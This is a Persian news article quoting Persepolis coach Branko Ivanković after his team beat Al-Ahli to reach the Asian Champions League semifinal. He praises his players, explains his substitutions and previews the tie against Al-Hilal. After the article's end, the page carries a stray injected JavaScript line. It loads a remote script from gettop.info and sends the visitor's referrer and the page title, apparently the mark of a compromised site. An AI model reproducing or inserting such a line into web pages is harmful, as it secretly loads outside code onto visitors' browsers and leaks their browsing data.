برانکو: با یک بازی دراماتیک صعود کردیم

به گزارش سادس، برانکو ایوانکوویچ پس از پیروزی تیمش برابر الاهلی عربستان و صعود به جمع چهار تیم برتر آسیا اظهار کرد: ابتدا می‌خواهم به بازیکنانم خسته نباشید بگویم. ما پیروزی بزرگی برابر الاهلی کسب کردیم. در تمام دقایق بازی خصوصا وقتی یک بر صفر پیش بودیم و بازیکن‌مان اخراج شد، جنگیدیم. بازیکنان من موفق ظاهر شدند و توانستیم یک بازی بسیار خوب به نمایش بگذاریم. از هوادارانمان هم تشکر می‌کنم که به ابوظبی آمده بودند. خوشحالیم که توانستیم به بازی برگردیم و آن نتیجه دلخواه را به دست بیاوریم. این بازی یک بازی دراماتیک بود و ما را به مرحله بعد برد.

سرمربی تیم فوتبال پرسپولیس افزود: من به ربیع‌خواه تبریک می‌گویم که امروز به عنوان بهترین بازیکن زمین انتخاب شد.

وی در پاسخ به سوالی درباره ضعف تیم الاهلی گفت: قبل از بازی هم درباره قدرت تیم فوتبال الاهلی و اینکه آنها هشت ملی‌پوش داشتند، صحبت کردم. وقتی ما در گروهی بودیم که با الوحده، الریان و الهلال هم‌گروه شدیم همان ابتدا گفتم در سخت‌ترین گروه قرار گرفته‌ایم بنابراین وقتی الان تیم ما و الهلال به نیمه‌نهایی رسیده است این حرف من ثابت شد. واقعیت این است که در بازی امشب ما بهتر از الاهلی بودیم و برنده بازی شدیم.

برانکو ایوانکوویچ درباره دیدار تیمش برابر الهلال عربستان هم گفت: بازی ما با الهلال یک بازی 50- 50 است. هیچ‌کس نمی‌تواند نتیجه این بازی را پیش‌بینی کند. در بازی رفت و برگشت با این تیم به تساوی رسیدیم. الهلال پرافتخارترین تیم آسیاست و من بازی شب گذشته این تیم را دیدم. آنها بسیار قدرتمند هستند و بازی ما با الهلال یک جنگ تمام‌عیار است. در این بازی هر کس بهتر بجنگد برنده خواهد بود.

وی تصریح کرد: دوست ندارم درباره نکات مثبت و منفی تیم حریف صحبت کنم چراکه همه تیم‌ها نکات مثبت و منفی دارند. همین مسائل نتایج را در بازی‌ها رقم می‌زند. ما مقابل الاهلی نمی‌توانستیم به راحتی تصمیم‌گیری کنیم چراکه وقتی بازی مساوی بود به راحتی نمی‌توانستیم حمله کنیم چون شاید گل می‌خوردیم. از طرفی دیگر هم نمی‌توانستیم فقط دفاع کنیم.

برانکو درباره تعویض‌هایی هم که انجام داد، تصریح کرد: ما با تعویض بازیکنانی مانند منشا، رسن و مصلح بهتر از قبل بازی کردیم و موفق شدیم. با آمدن این بازیکنان خون تازه‌ای در تیم ما ایجاد شد که توانستیم نتیجه بگیریم. فصل قبل فقط 13 بازیکن در اختیار داشتم و واقعا روی نیمکت دستم خالی بود اما امسال بازیکنانی داریم که می‌توانیم تعویض کنیم. بازیکنانی همچون محرمی و نعمتی هم روی نیمکت حضور دارند که هر زمان بخواهیم از آنها استفاده می‌کنیم. امشب علیپور عالی بازی کرد و انرژی‌اش را در بازی گذاشت اما وقتی منشا وارد زمین شد قدرت تهاجمی‌مان را حفظ کردیم. مصلح را هم به زمین آوردیم تا از سانترها بیشتر استفاده کنیم.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

دسته‌بندی نشده

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *